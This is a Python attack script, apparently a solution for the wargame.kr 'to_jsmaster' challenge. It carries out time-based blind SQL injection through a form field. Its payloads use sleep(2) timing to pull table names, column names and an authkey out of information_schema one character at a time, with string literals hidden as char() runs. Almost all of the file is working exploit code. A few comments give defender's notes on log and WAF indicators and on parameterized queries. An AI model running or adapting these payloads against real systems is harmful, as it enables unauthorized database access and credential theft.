import requests
import time
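def request_len(query, count=-1):
    """Find an integer answer (0..99) by probing a time-based boolean oracle.

    ``query`` is a format template whose placeholders are filled with the
    candidate integer (and, when ``count`` is not -1, with ``count`` first).
    Each candidate is posted in the ``type`` form field; a response that takes
    longer than 2 seconds is read as "true" and the candidate is returned.

    Args:
        query: Template with one ``{}`` slot (``count == -1``) or two slots
            (``count`` goes into ``{0}``, the candidate into ``{1}``).
        count: Optional leading value for the template; -1 means "not used".

    Returns:
        The first candidate in 0..99 that produced a slow response, or -1 when
        none did.

    Reads the module-level ``url`` and ``cookies`` assigned in the
    ``__main__`` block.

    Defender's note: this probing pattern is visible in server logs as a burst
    of POSTs to one endpoint whose response times cluster just above the
    ``sleep()`` delay; parameterized queries for the ``type`` field remove the
    oracle entirely.
    """
    for candidate in range(0, 100):
        if count == -1:
            payload = query.format(candidate)
        else:
            payload = query.format(count, candidate)
        data = {'cont': '', 'mail': '', 'type': payload}
        print(payload)
        # monotonic clock: a wall-clock adjustment mid-request would otherwise
        # distort the elapsed time being compared against the threshold
        start = time.monotonic()
        requests.post(url, cookies=cookies, data=data)
        elapsed = time.monotonic() - start
        # the 2 s threshold matches the sleep(2) used in the probe templates
        if elapsed > 2:
            print("[*] LENGTH: " + str(candidate))
            return candidate
    return -1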
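def request_value(query, value_len, count=-1):
    """Recover a string of ``value_len`` characters, one position at a time.

    For every position 1..``value_len`` the candidate character codes in the
    module-level ``index_list`` are tried in order; the first candidate whose
    request takes longer than 2 seconds is accepted and the inner loop stops.

    Args:
        query: Template with slots for the position and the character code
            (``{0}``, ``{1}``), or for ``count``, position and code
            (``{0}``, ``{1}``, ``{2}``) when ``count`` is not -1.
        value_len: Number of character positions to probe.
        count: Optional leading value for the template; -1 means "not used".

    Returns:
        The recovered string. A position where no candidate trips the
        threshold is silently skipped, so the result can be shorter than
        ``value_len``; callers here treat an empty result as failure.

    Reads the module-level ``url``, ``cookies`` and ``index_list`` assigned in
    the ``__main__`` block.
    """
    value = ''
    for position in range(1, value_len + 1):
        for code in index_list:
            if count == -1:
                payload = query.format(position, code)
            else:
                payload = query.format(count, position, code)
            data = {'cont': '', 'mail': '', 'type': payload}
            print(payload)
            # monotonic clock avoids wall-clock jumps skewing the measurement
            start = time.monotonic()
            requests.post(url, cookies=cookies, data=data)
            elapsed = time.monotonic() - start
            # the 2 s threshold matches the sleep(2) used in the probe templates
            if elapsed > 2:
                value += chr(code)
                break
    print("[*] VALUE: " + value)
    return value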
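if __name__ == '__main__':
    # Session cookie and target endpoint used by every probe request.
    # 'YourSessionValue' is a placeholder the user is expected to replace.
    cookies = {'ci_session': 'YourSessionValue'}
    url = 'http://wargame.kr:8080/qna/?page=to_jsmaster'
    # Candidate character codes: digits (48-57), underscore (95),
    # lowercase letters (97-122).
    index_list = list(range(48, 58)) + [95] + list(range(97, 123))

    # Every template below evaluates a condition inside if(...) and calls
    # sleep(2) when it is true, so the 2 s response-time threshold in
    # request_len / request_value is the oracle. String literals are spelled
    # as concat(char(...)) runs rather than quoted text. Defender's note:
    # 'information_schema', 'sleep(' and long 'char(' runs in a form field are
    # reliable log/WAF indicators of this probing.

    ######################### TABLE ##############################
    query = "(if(length((select table_name from information_schema.tables where table_type=concat(char(98),char(97),char(115),char(101),char(32),char(116),char(97),char(98),char(108),char(101)) limit 0,1))={0},sleep(2),1))"
    table_len = request_len(query)
    if table_len == -1:
        raise SystemExit("table_len code Error")
    print(table_len)
    query = "(if(ascii(substr((select table_name from information_schema.tables where table_type=concat(char(98),char(97),char(115),char(101),char(32),char(116),char(97),char(98),char(108),char(101)) limit 0,1),{0},1))={1},sleep(2),1))"
    table_name = request_value(query, table_len)
    if table_name == '':
        raise SystemExit("table_name code Error")

    ######################### COLUMN ##############################
    # column_count is the count(column_name) answer, not a string length
    query = "(if(length((select count(column_name) from information_schema.columns where table_name=concat(char(97),char(117),char(116),char(104),char(107),char(101),char(121))))={0},sleep(2),1))"
    column_count = request_len(query)
    if column_count == -1:
        raise SystemExit("column_count code Error")
    column = []
    for count in range(0, column_count):
        # count selects the row via "limit {0},1" in both templates
        query = "(if(length((select column_name from information_schema.columns where table_name=concat(char(97),char(117),char(116),char(104),char(107),char(101),char(121)) limit {0},1))={1},sleep(2),1))"
        column_len = request_len(query, count)
        if column_len == -1:
            raise SystemExit("column_len code Error")
        query = "(if(ascii(substr((select column_name from information_schema.columns where table_name=concat(char(97),char(117),char(116),char(104),char(107),char(101),char(121)) limit {0},1),{1},1))={2},sleep(2),1))"
        column_name = request_value(query, column_len, count)
        if column_name == '':
            raise SystemExit("column_name code Error")
        column.append(column_name)
    print("COLUMN: " + str(column))

    ######################### AUTHKEY_VALUE ##############################
    query = "(if(length((select authkey from authkey limit 0,1))={0},sleep(2),1))"
    AUTHKEY_len = request_len(query)
    if AUTHKEY_len == -1:
        raise SystemExit("AUTHKEY_len code Error")
    query = "(if(ascii(substr((select authkey from authkey limit 0,1),{0},1))={1},sleep(2),1))"
    AUTHKEY_value = request_value(query, AUTHKEY_len)
    if AUTHKEY_value == '':
        raise SystemExit("AUTHKEY_value code Error")
    # Bug fix: the original printed an always-empty AUTHKEY variable here
    # instead of the value request_value() returned.
    print("[*] AUTHKEY: " + AUTHKEY_value)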